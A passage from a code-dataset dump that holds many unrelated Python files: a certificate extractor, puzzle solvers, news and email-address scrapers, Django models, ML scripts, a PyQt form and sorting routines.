errno.EEXIST:\n raise\n try:\n os.makedirs('certs_flat')\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n\n # Load existing file if present\n acme_file_path = os.path.join(path, \"acme.json\")\n if os.path.isfile(acme_file_path):\n logging.info(\"Loading initial file {}\".format(acme_file_path))\n extract_certificates_from_acme(acme_file_path)\n\n # Create event handler and observer\n event_handler = AcmeFileHandler()\n observer = Observer()\n\n # Register the directory to watch\n observer.schedule(event_handler, path)\n\n # Main loop to watch the directory\n observer.start()\n logging.info(\"Watching {} for certificate updates\".format(path))\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"624365155","text":"#!/usr/bin/python3\n\nimport copy\n\ntest_code = \"\"\"nop +0\nacc +1\njmp +4\nacc +3\njmp -3\nacc -99\nacc +1\njmp -4\nacc +6\"\"\".split('\\n')\n\ndef load(code):\n program = []\n\n for line in code:\n instr,arg = line.split(' ')\n 
program.append([instr,int(arg)])\n\n return program\n\ndef run(program):\n acc = 0\n i = 0\n loop = set() \n \n while(1):\n if i in loop:\n break\n loop.add(i)\n\n (instr,arg) = program[i]\n\n if instr == 'nop':\n i = i + 1\n elif instr == 'acc':\n acc = acc + arg\n i = i + 1\n elif instr == 'jmp':\n i = i + arg \n return acc \n \ndef run(program):\n acc = 0\n i = 0\n loop = set() \n \n while(1):\n if i in loop:\n exitval = 'LOOP'\n break\n elif i == len(program):\n exitval = 'TERM'\n break\n else:\n loop.add(i)\n\n (instr,arg) = program[i]\n\n if instr == 'nop':\n i = i + 1\n elif instr == 'acc':\n acc = acc + arg\n i = i + 1\n elif instr == 'jmp':\n i = i + arg \n return (acc,exitval)\n\ntprogram = load(test_code)\nacc, exitval = run(tprogram)\n\nassert acc == 5\n\nf = open('input8.txt')\n\ncode = [ line[:-1] for line in f ]\nprogram = load(code)\nacc,_ = run(program)\n\nassert acc == 1521\nprint('Part One', acc)\n\ntprogram2 = tprogram.copy() \ntprogram2[-2][0] = 'nop'\n\nacc,exitval = run(tprogram2)\n\nassert exitval == 'TERM'\n\ndef fix_program(program):\n for i in range(len(program)):\n mprogram = copy.deepcopy(program)\n if mprogram[i][0] == 'acc':\n continue\n else:\n if mprogram[i][0] == 'nop':\n mprogram[i][0] = 'jmp'\n else:\n mprogram[i][0] = 'nop'\n acc,exitval = run(mprogram)\n if exitval == 'TERM':\n return (acc,mprogram)\n\nacc,_ = fix_program(program)\nprint('Part Two:',acc)\n \n \n\n","sub_path":"20/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"494540145","text":"import requests\nimport bs4\nimport re\nimport time\nimport json\n\n\n\ndef main_page():\n req = requests.get(\"https://www.chicagotribune.com/\")\n soup = bs4.BeautifulSoup(req.text,'html.parser')\n div = soup.findAll('div', attrs={'class': 'flex-grid'})\n refs = []\n ref_dict = {}\n for d in div:\n refs += re.findall(r'
(.*?)', str(div))\n    for ref in refs:\n        key = re.sub(r'<.*?>', '', ref)\n        val = re.findall(r'href=\"(.*?)\"', ref)[0]\n        ref_dict[key] = val\n    return ref_dict\n\n\ndef content_news(news_link: str):\n    #req = requests.get(news_link)\n    news_link=\"https://www.chicagotribune.com/\"\n    req = requests.get(news_link)\n    soup = bs4.BeautifulSoup(req.text,'html.parser')\n    content_dict = {}\n\n    if re.search('www.chicagotribune.com', news_link):\n        cont = soup.findAll('main', attrs={'class': 'artcl--m'})\n        aucont = soup.findAll('div', attrs={'class': 'byline-wrapper'})\n    else:\n        return {}\n\n    paragraphs = []\n    authors = []\n    for div in cont:\n        paragraphs += re.findall(r'(.*?)
', str(div))\n for div in aucont:\n authors += re.findall(r'(.*?)', str(div))\n if len(paragraphs):\n content_dict['content'] = ' '.join(paragraphs)\n if len(authors):\n content_dict['authors'] = ' '.join(authors)\n return content_dict\n\n\ndef validate(entry: dict):\n keywords = ['republican', 'Republican', 'GOP', 'democratic', 'Democratic']\n title = entry.get('title')\n content = entry.get('content')\n if title == None or content == None:\n return False\n fit = False\n for keyword in keywords:\n if re.search(keyword, title):\n fit = True\n if re.search(keyword, content):\n fit = True\n return fit\n\n\ndef save_json (data, fname: str):\n with open(fname, 'w') as fp:\n json.dump(data, fp)\n\n\ndef load_json(fname: str):\n d = {}\n try:\n with open(fname, 'r') as fp:\n d = json.load(fp)\n finally:\n return d\n\n\nif __name__ == '__main__':\n entries = load_json(\"chicagotribune.json\")\n filtered_entries = load_json(\"chicagotribune_filtered.json\")\n i = 1\n\n while 1:\n print(\"Попытка #\" + str(i))\n refs = main_page()\n for entry_name, link in refs.items():\n if entries.get(link) == None:\n time.sleep(.5)\n print('Получение контента: \"' + entry_name + '\"...')\n news = content_news(link)\n if len(news):\n news['title'] = entry_name\n entries[link] = news\n if validate(news):\n filtered_entries[link] = news\n else:\n entries[link] = {}\n save_json(entries, \"chicagotribune.json\")\n save_json(filtered_entries, \"chicagotribune_filtered.json\")\n print(\"Попытка #\" + str(i) + \" закончена\\n\")\n i += 1\n time.sleep(3600)","sub_path":"Chicagotribune_news.py","file_name":"Chicagotribune_news.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539847539","text":"def main():\n print(\"ENTRE DOS VALORES\")\n primero=int(input(\"Escriba un numero: \"))\n segundo=int(input(f\"Escriba un numero mayor que {primero}: \"))\n contador=0\n\n while segundo<=primero:\n segundo=int(input(f\"{segundo} no es mayor que {primero}. 
Intentelo de nuevo: \"))\n while segundo>primero:\n numero=int(input(f\"Escriba un numero entre {primero} y {segundo}: \"))\n\n if numero>=primero and numero<=segundo:\n contador=contador+1\n\n else:\n print(f\"Ha escrito {contador} numeros entre {primero} y {segundo}.\")\n segundo=primero+segundo\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bucle while 1/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612478006","text":"def digits_sum(num):\n\tsum = 0\n\twhile(num > 0):\n\t\trem = num % 10\n\t\tsum += rem\n\t\tnum = num // 10\n\treturn sum\n\ndef compute_join_points(s1, s2):\n\tsum1 = 0\n\tsum2 = 1\n\twhile(s1 != s2):\n\t\tsum1 = s1 + digits_sum(s1)\n\t\tsum2 = s2 + digits_sum(s2)\n\t\ts1 = sum1\n\t\ts2 = sum2\n\t\tif(s1 == s2):\n\t\t\treturn s1\n \n\t\t\t\nprint(compute_join_points(471, 480))\n\n","sub_path":"bootcamp_problems/sum_joint.py","file_name":"sum_joint.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95958367","text":"\n# coding: utf-8\n\n# # [LEET] Maxincreaseskyline\n# \n\n# In[ ]:\n\n\n\na = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]\ndef maxincreaseskyline(grid):\n total = 0 \n grid_vert = list(zip(*grid))\n lr_skyline = []\n ud_skyline = []\n for row in grid:\n lr_skyline.append(max(row))\n for column in grid_vert:\n ud_skyline.append(max(column))\n for row in grid:\n row_ind = grid.index(row)\n for index in range(len(row)):\n \n total += min(lr_skyline[row_ind],ud_skyline[index]) - row[index]\n\n return total\nmaxincreaseskyline(a)\n\n","sub_path":"Max Increase Skyline.py","file_name":"Max Increase Skyline.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"321527184","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import *\nimport sys\nimport osn.osnov as osn\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport docx as doc\nimport numpy as np\nimport pandas as pds\n# end of importing\n\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n self.title = 'Генератор тестов'\n self.left = 500\n self.top = 300\n self.width = 800\n self.height = 600\n self.initUI()\n\n def initUI(self):\n self.textbox = QLabel(\"Введите количество тестов\\n(не более 100)\")\n self.textbox2 = QLabel(\"Выберите количество уровней сложности\")\n self.textbox3 = QLabel(\"Выберите количество задач каждого уровня сложности\\n(сумма задач не должна превышать 100)\")\n self.numvar1 = QLabel(\"Введите количество вариантов\\n(не более 40)\")\n\n self.text = QLineEdit(self) # поля для ввода текта\n self.text3 = QLineEdit(self)\n self.numvar2 = QLineEdit(self)\n\n self.text2 = QComboBox(self) # выбор количества сложностей\n self.ls = ['1', '2', '3']\n self.text2.addItems(self.ls)\n\n self.butt = QPushButton(\"ok\")\n self.dir = QPushButton(\"Выберите путь для создания теста\")\n self.new = QPushButton(\"Добавьте новый тип задания\")\n\n hbox = QGridLayout()\n hbox.setVerticalSpacing(0.5)\n hbox.addWidget(self.textbox,0,0,2,1)\n hbox.addWidget(self.text,0,1,2,3)\n hbox.addWidget(self.numvar1,1,0,2,1)\n hbox.addWidget(self.numvar2,1,1,2,3)\n hbox.addWidget(self.textbox2, 2, 0,2,1)\n hbox.addWidget(self.text2, 2, 1,2,3)\n hbox.addWidget(self.textbox3, 3, 0,2,1)\n hbox.addWidget(self.text3, 3, 1,2,3)\n hbox.addWidget(self.new, 
4,0,3,5)\n hbox.addWidget(self.dir, 5,0,3,5)\n hbox.addWidget(self.butt, 6, 0,3,5)\n\n self.new.clicked.connect(self.creating) # обработка нажатия кнопок\n self.dir.clicked.connect(self.pick_new)\n self.butt.clicked.connect(self.on_click)\n self.setLayout(hbox)\n\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.show()\n\n @pyqtSlot()\n def pick_new(self):\n self.dialog = QFileDialog()\n self.folder_path = self.dialog.getExistingDirectory(None, \"Select Folder\")\n\n\n @pyqtSlot()\n def on_click(self):\n self.ammtests = self.text.text()\n self.each = self.text3.text()\n self.stro = str(self.text2.currentText())\n self.w1 = QLabel(\"Тест готов\")\n self.w1.move(800, 500)\n self.w1.resize(100, 200)\n self.w1.show()\n\n @pyqtSlot()\n def creating(self):\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())\n\n","sub_path":"osn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505737221","text":"\"\"\"creates various optimizers\"\"\"\nimport torch.optim as optim\nfrom torch.optim.lr_scheduler import LambdaLR\n\n\nclass OptimizerFactory():\n \"\"\"OptimizerFactory contains wrappers to create various optimizers.\"\"\"\n @staticmethod\n def create(args, tagger, special_bert = False): \n if args.opt == 'sgd':\n optimizer = optim.SGD(list(tagger.parameters()), lr=args.lr, momentum=args.momentum)\n elif args.opt == 'adam':\n optimizer = optim.Adam(list(tagger.parameters()), lr=args.lr, betas=(0.9, 0.999))\n else:\n raise ValueError('Unknown optimizer, must be one of \"sgd\"/\"adam\".')\n \n if (special_bert):\n bert_parameters = list(tagger.word_seq_indexer.emb.parameters())\n not_bert_parameters = list(list(tagger.birnn_layer.parameters()) + list(tagger.lin_layer.parameters()) + list(tagger.log_softmax_layer.parameters()))\n optimizer = optim.Adam([{'params':not_bert_parameters, 'lr':args.lr, 'betas':(0.9, 0.999)}, {'params':bert_parameters, 'lr':args.lr_bert, 'betas':(0.9, 0.999)}])\n\n scheduler = LambdaLR(optimizer, lr_lambda=lambda epoch: 1 / (1 + args.lr_decay * epoch))\n #bert_scheduler = LambdaLR(bert_optimizer, lr_lambda=lambda epoch: 1 / (1 + args.lr_decay * epoch))\n return optimizer, scheduler\n","sub_path":"src/factories/factory_optimizer.py","file_name":"factory_optimizer.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"434981735","text":"from __future__ import unicode_literals\nfrom django.db import models\nfrom django.conf import settings\nfrom clients.models import Client\nfrom vehicles.models import Vehicle, Vehicle_version\nimport uuid\n# Create your models here.\n\nclass StockExchange(models.Model):\n\t\n\t##Tipo de mensualidad 60 o 40 mensualidades\n\t######\n\tdescription = models.TextField()\t\n\tmonthly = models.IntegerField()\n\n\tclass Meta:\n\t\tverbose_name = \"StockExchange\"\n\t\tverbose_name_plural = \"StockExchanges\"\n\n\tdef __str__(self):\n\t\treturn str(self.monthly)\n\nclass groups_stockExchange(models.Model):\n\tstockexchange = models.ForeignKey(StockExchange, related_name= 'groups_stockExchange')\n\tunique_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\tmaximum_number_customers = models.IntegerField()\n\tgroup_description = models.TextField()\n\n\tdef __str__(self):\n\t\treturn 
str(self.unique_id)\n\n\n\n\n\n\n\n\nclass SettingsFinantial(models.Model):\n\tupdate_factor = models.FloatField()\n\tadministration_fee = models.FloatField()\n\tinscription_fee = models.FloatField()\n\n\tclass Meta:\n\t\tverbose_name = \"SettingsFinantial\"\n\t\tverbose_name_plural = \"SettingsFinantials\"\n\n\t\t# def __str__(self):\n\t\t# \treturn (self.update_factor, self.administration_fee)\n\nclass Payment_methods(models.Model):\n\n\n\tname = models.CharField(max_length=100)\n\n\n\n\tdef __str__(self):\n\n\t\treturn self.name\n\n\n\n\n\n\nclass Agreement(models.Model):\n\n\tunique_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\t\n\tBOOL_CHOICES = ((True, 'Activo'), (False, 'Finalizado'))\t\n\tzone = models.CharField(max_length=50, blank=True, null=True)\n\tobservations = models.TextField(blank=True, null=True)\n\tdate = models.DateField(auto_now=True)\n\tstatus = models.BooleanField(default=False)\n\tBOOL_CHOICES2 = ((True, 'Adjudicado'),(False, 'No Adjudicado'))\t\n\tid_client = models.ForeignKey(Client, related_name='agreement')\n\tid_vehicle_version = models.ForeignKey(Vehicle_version, related_name='agreement')\n\tgroups_stockexchange = models.ForeignKey(groups_stockExchange, related_name='agreement')\n\tvehicle_price = models.FloatField(blank=True, null=True)\n\tpayment_deadline = models.DateField(auto_now=True)\n\tadjudication = models.BooleanField(choices=BOOL_CHOICES2, default=False)\n\t##Camos de contrato\t\n\n\tdef __str__(self):\n\n\t\treturn str(self.unique_id)\n\n\nclass DetailPayment (models.Model):\n\t\n\tagreement = models.ForeignKey(Agreement, related_name='detail_payment' )\n\tconcept = models.CharField(max_length=250)\n\tpayment_reference = models.CharField(max_length=400, null= True, blank = True)\n\tamount = models.FloatField()\n\tobservations = models.TextField()\n\tdate_payment = models.DateField()\n\n\n\tclass Meta:\n\t\tverbose_name = \"DetailPayment\"\n\t\tverbose_name_plural = \"DetailPayments\"\n\n\tdef __str__(self):\n\t\treturn self.concept\n\n\n\n\n# class MonthlyPayment(models.Model):\n# \tmonthly = models.CharField(max_length=100)\n# \tid_vehiclebooking = models.ForeignKey(VehicleBooking, related_name='monthlypayment')\n\n# \tclass Meta:\n# \t\tverbose_name = \"MonthlyPayment\"\n# \t\tverbose_name_plural = \"MonthlyPayments\"\n\n# \tdef __str__(self):\n# \t\treturn self.monthly\n","sub_path":"vehicles_finances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411384414","text":"import scrapy\nfrom selenium import webdriver\n\nimport re\nimport logging\n\nemail_re = re.compile('[\\w\\d]+@[\\w\\d]+\\.[\\w\\d]+')\nchangeroute_re = re.compile('changeRoute\\(\\'(.*)\\'\\)')\n\nclass EmailScraperSpider(scrapy.Spider):\n\n custom_settings = {'NEWSPIDER_MODULE': 'emailscraper.spiders',\n 'FEED_FORMAT': 'json',\n 'SPIDER_MODULES': ['emailscraper.spiders'],\n 'FEED_URI': 'temp',\n 'BOT_NAME': 'emailscraper',\n 'ROBOTSTXT_OBEY': True }\n\n\n name = 'emailscraper'\n\n browser = webdriver.Chrome()\n\n def __init__(self, website=None, *args, **kwargs):\n super(EmailScraperSpider, self).__init__(*args, **kwargs)\n self.start_urls = ['http://{0}/'.format(website)]\n self.allowed_domains = [website]\n\n def parse(self, response):\n for href in response.xpath('//a/@href'):\n full_url = response.urljoin(href.extract())\n yield scrapy.Request(full_url, callback=self.parse_emails)\n for cr_call in 
response.xpath('//span/@ng-click'):\n route = changeroute_re.match(cr_call.extract()).group(1)\n full_url = response.urljoin('/' + route)\n yield scrapy.Request(full_url, callback=self.parse_emails)\n\n def parse_emails(self, response):\n self.browser.get(response.url)\n body = self.browser.page_source\n logging.info('Reading response body: ' + body)\n for email in email_re.findall(body):\n logging.info('Found email address: ' + email)\n yield {'email': email}\n\n def closed(self, reason):\n self.browser.close()\n super(EmailScraperSpider, self).close(reason)\n\n","sub_path":"emailscraper/email_scraper_spider.py","file_name":"email_scraper_spider.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"504304299","text":"import os.path\nimport utl.messages as msg\n\n#Extensiones de archivos\nEXT={\n 'SQL':'.sql',\n 'JSON':'.json',\n 'DB':'.db',\n}\n\n\ndef LeerArch(path=\"\",ext=\"\"):\n \"\"\"LeerArch : Lee un archivo linea por linea creando un string master\"\"\"\n if ValidArch(path,ext):\n linemaster=\"\"\n fdata = open(path, 'r')\n for lineaux in fdata:\n linemaster += lineaux\n else:\n return None,msg.ERROR.InputMsggErr(\"ExistArch\")\n\n\ndef ValidArch(path=\"\",ext=\"\"):\n \"\"\"ValidArch : valida la extencion de un archivo e valida si existe\n path:el archivo ubicado\n ext:extension del archivo\"\"\"\n global EXT\n if ExistArch(path):\n try:\n return EXT[ext] in path\n except :\n return False\n else:\n return False\n\n\ndef ExistArch(path=\"\"):\n \"\"\"ExistArch : Verifica si el archivo o carpeta existe.\"\"\"\n if os.path.isdir(path) or os.path.isfile(path):\n return True\n else:\n return False\n\ndef CreateDir(path=\"\"):\n \"\"\"CreateDir : Crea una carpeta.\"\"\"\n if ExistArch(path):\n return None\n else:\n try:\n os.mkdir(path)\n return None\n except:\n return msg.ERROR.MsggErr(\"CreateArch\")","sub_path":"BatchPaty/utl/arch.py","file_name":"arch.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581600522","text":"import insightconnect_plugin_runtime\nfrom .schema import ConnectionSchema, Input\nfrom insightconnect_plugin_runtime.exceptions import PluginException, ConnectionTestException\n\n# Custom imports below\nfrom icon_checkphish.util.api import CheckPhishAPI\n\n\nclass Connection(insightconnect_plugin_runtime.Connection):\n def __init__(self):\n super(self.__class__, self).__init__(input=ConnectionSchema())\n self.api = None\n\n def connect(self, params):\n self.logger.info(\"Connect: Connecting...\")\n self.api = CheckPhishAPI(\n api_key=params.get(Input.API_KEY).get(\"secretKey\"),\n logger=self.logger,\n )\n\n def test(self):\n try:\n self.api.test_api()\n except PluginException:\n raise ConnectionTestException(\n cause=\"Connection Test Failed.\", assistance=\"Please check that your API key is correct.\"\n )\n\n return {}\n","sub_path":"plugins/checkphish/icon_checkphish/connection/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97337015","text":"# Considerar la funcion f tal que f(x) = 1/x.\n# Utilizando el ejercicio anterior, graficar en una misma figura f y\n# p que interpole {(i, f(i))} i=1..5, usando para ambas los puntos equiespaciados\n# zj = 24/25 + j/25, j = 1, . . . 
, 101\n\nfrom ej2_inewton import inewton\nfrom ej1_ilagrange import ilagrange\nimport matplotlib.pyplot as plt\n\nf = lambda x: 1 / x\n\n# {(i, f(i))} i=1..5\nlista_i = list(range(1, 6))\nlista_f = [f(i) for i in lista_i]\n\n# zj = 24/25 + j/25, j = 1, . . . , 101\nlista_z = [24 / 25 + j / 25 for j in range(1, 102)]\nf_plot = [f(z) for z in lista_z]\n\n# p_plot = ilagrange(lista_i, lista_f, lista_z)\np_plot = inewton(lista_i, lista_f, lista_z)\n\nplt.plot(lista_z, f_plot, label=\"funcion f\")\nplt.plot(lista_z, p_plot, label=\"polinomio interpolante\")\nplt.grid()\nplt.legend()\n\nplt.show()","sub_path":"codigos/lab3/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355708544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 14:14:28 2021\n\n@author: JIL\n\n\"\"\"\n\n'''载入数据'''\nfrom sklearn import datasets\n\nboston = datasets.load_boston()\nx, y = boston.data, boston.target\n'''引入标准化函数'''\nfrom sklearn import preprocessing\n\nx_MinMax = preprocessing.MinMaxScaler()\ny_MinMax = preprocessing.MinMaxScaler()\n\n''' 将 y 转换成 列 '''\nimport numpy as np\n\ny = np.array(y).reshape(len(y), 1)\n'''标准化'''\nx = x_MinMax.fit_transform(x)\ny = y_MinMax.fit_transform(y)\n\n''' 按二八原则划分训练集和测试集 '''\nfrom sklearn.model_selection import train_test_split\n\nnp.random.seed(2019)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\n'''模型构建'''\nfrom sklearn.neural_network import MLPRegressor\n\nfit1 = MLPRegressor(hidden_layer_sizes=(100, 50), activation='relu', solver='adam', alpha=0.01, max_iter=200)\n# 第一个隐藏层有100个节点,第二层有50个,激活函数用relu,梯度下降方法用adam\n# 惩罚系数为0.01,最大迭代次数为200\nprint (\"fitting model right now\")\nfit1.fit(x_train, y_train)\npred1_train = fit1.predict(x_train)\n'''计算训练集 MSE'''\nfrom sklearn.metrics import mean_squared_error\n\nmse_1 = mean_squared_error(pred1_train, y_train)\nprint (\"Train ERROR = \", mse_1)\n'''计算测试集mse'''\npred1_test = fit1.predict(x_test)\nmse_2 = mean_squared_error(pred1_test, y_test)\nprint (\"Test ERROR = \", mse_2)\n\n'''结果可视化'''\nimport matplotlib.pyplot as plt\n\nxx = range(0, len(y_test))\nplt.figure(figsize=(8, 6))\n#反归一化\n\n#pred1_test = y_MinMax.inverse_transform(pred1_test)\ny_test = y_MinMax.inverse_transform(y_test)\npred1_test = np.array(pred1_test).reshape(len(pred1_test),1)\npred1_test = y_MinMax.inverse_transform(pred1_test)\n\nplt.plot(xx, pred1_test, 'ko-', label=\"Predict\")\nplt.plot(xx, y_test, 'ro-', label=\"Real\")\n\n# plt.scatter(xx, y_test, color=\"red\", label=\"Sample Point\", linewidth=3)\n# plt.plot(xx, pred1_test, color=\"orange\", label=\"Fitting Line\", linewidth=2)\nplt.legend()\nplt.show()\n#分析结果\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import r2_score\ny_t = []\ny_h = []\nfor i in y_test:\n y_t.append(i)\nfor i in pred1_test:\n y_h.append(i)\nprint(\"MSE:\", mean_squared_error(y_t, y_h))\nprint(\"MAS:\", mean_absolute_error(y_t, y_h))\nprint(\"R2:\", r2_score(y_t, y_h))\n","sub_path":"NNRa.py","file_name":"NNRa.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"44788214","text":"import sys\n\ndef hex2binary(hex_code: str) -> str:\n return ''.join([bin(int(elem, 16))[2:].rjust(4, \"0\") for elem in hex_code])\n\ndef parse(code):\n version, code = int(code[:3], 2), code[3:]\n package_type, code = int(code[:3], 
2), code[3:]\n if package_type == 4:\n # literal value\n value = 0\n while True:\n section, code = code[:5], code[5:]\n value <<= 4\n value += int(section[1:], 2)\n if section[0] == \"0\":\n break\n return value, code\n else:\n # operator\n length_bit, code = code[0], code[1:]\n length_bit = 11 if length_bit == \"1\" else 15\n package_count, code = int(code[:length_bit], 2), code[length_bit:]\n sub_values = []\n for _ in range(package_count):\n if not code.strip('0'):\n print(\"Invalid package length\")\n break\n sub_value, code = parse(code)\n # check if invalid package\n if sub_values is not None:\n sub_values.append(sub_value)\n if package_type == 0:\n return sum(sub_values), code\n if package_type == 1:\n value = 1\n for sub_value in sub_values:\n value *= sub_value\n return value, code\n if package_type == 2:\n return min(sub_values), code\n if package_type == 3:\n return max(sub_values), code\n if package_type == 5:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] > sub_values[1], code\n if package_type == 6:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] < sub_values[1], code\n if package_type == 7:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] == sub_values[1], code\n raise Exception(\"The given code is not binary!\")\n\ndata = open(sys.argv[1], 'r').read().split('\\n')[:-1]\nfor entry in data:\n code = hex2binary(entry)\n version, _ = parse(code)\n print(int(version))\n \n \n \n","sub_path":"2021/16/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273819455","text":"import copy\nimport pytest\n\nfrom spark.config.config_set import UniversalConfigSet\nfrom spark.model.gaussian_model import GaussianModel\nfrom spark.model.training_data import TrainingData\n\n\n@pytest.fixture(scope=\"class\", autouse=True)\ndef gaussian_model():\n training_data = TrainingData()\n config_set = UniversalConfigSet(10, 1024 * 10)\n yield GaussianModel(training_data, config_set)\n\n\nclass TestGaussianModel:\n\n def test_gaussian_model_no_data(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n with pytest.raises(Exception, match=\"No training data found\"):\n assert model.train()\n\n def test_gaussian_model_invalid_training_data(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n training_sample = {\n \"spark.sql.shuffle.partitions\": 100,\n \"spark.executor.memory\": 1024 * 5,\n \"spark.driver.memory\": 1024,\n \"invalid_config\": 123\n }\n with pytest.raises(Exception, match=\"Invalid config to be added as training data. 
\"\n \"Missing config: spark.executor.cores, Extra config: invalid_config\"):\n assert model.add_sample_to_train_data(training_sample, 12)\n\n def test_gaussian_model_training(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n training_sample = {\n \"spark.executor.memory\": 1024 * 5,\n \"spark.sql.shuffle.partitions\": 100,\n \"spark.executor.cores\": 4,\n \"spark.driver.memory\": 512\n }\n model.add_sample_to_train_data(training_sample, 12)\n model.add_sample_to_train_data(training_sample, 12)\n # Ensure the order in training data is same as the one in config_set\n assert model.training_data.get_training_data()[0][\"configs\"].get_all_param_names() == \\\n [\"spark.sql.shuffle.partitions\", \"spark.executor.memory\", \"spark.driver.memory\", \"spark.executor.cores\"]\n\n assert model.training_data.get_training_data()[0][\"configs\"].get_all_param_values() == \\\n [100, 1024 * 5, 512, 4]\n\n model.train()\n\n # Ensure that normalised values are between 0 and 1\n for normalized_config_value in model.training_inp_normalized[0]:\n assert 0 <= normalized_config_value <= 1\n\n # Ensure order is maintained\n assert model.training_inp_normalized[0] == model.training_inp_normalized[1]\n","sub_path":"spark/pytest/model/test_gaussian_model.py","file_name":"test_gaussian_model.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"643189514","text":"class Node:\n left = None\n right = None\n\n def __init__(self, key, val):\n self.key = key\n self.val = val\n\n\ndef insert(node, key, val):\n if node is None:\n return Node(key, val)\n if node.key == key:\n node.val = val\n elif node.key < key:\n node.left = insert(node.left, key, val)\n else:\n node.right = insert(node.right, key, val)\n return node\n\n\ndef search(node, key):\n if node is None:\n raise KeyError\n if node.key == key:\n return node.val\n elif node.key < key:\n return search(node.left, key)\n else:\n return search(node.right, key)\n\n\nclass BSTree:\n '''\n >>> tree = BSTree()\n\n >>> tree['a'] = 10\n\n >>> tree['b'] = 20\n\n >>> tree['b']\n 20\n\n >>> 'b' in tree\n True\n\n >>> 'c' in tree\n False\n '''\n root = None\n\n def __setitem__(self, key, val):\n self.root = insert(self.root, key, val)\n\n def __getitem__(self, key):\n return search(self.root, key)\n\n def __contains__(self, key):\n try:\n search(self.root, key)\n except KeyError:\n return False\n return True\n\n\ndef partition(seq):\n pi, seq = seq[0], seq[1:]\n lo = [x for x in seq if x < pi]\n high = [x for x in seq if x > pi]\n return lo, pi, high\n\n\ndef select(seq, k):\n lo, pi, high = partition(seq)\n m = len(lo)\n if m == k:\n return pi\n elif m > k:\n return select(lo, k)\n else:\n return select(high, k - m - 1)\n\n\ndef quick_sort(seq):\n if len(seq) <= 1:\n return seq\n lo, pi, high = partition(seq)\n return quick_sort(lo) + [pi] + quick_sort(seq)\n\n\ndef merge_sort(seq):\n mid = len(seq) / 2\n lft, rgt = seq[:mid], seq[mid:]\n if len(lft) > 1:\n lft = merge_sort(lft)\n if len(rgt):\n rgt = merge_sort(rgt)\n res = []\n while lft and rgt:\n if lft[-1] > rgt[-1]:\n res.append(lft.pop())\n else:\n res.append(rgt.pop())\n res.reverse()\n return (lft or rgt) + res\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"divide_and_conquer.py","file_name":"divide_and_conquer.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
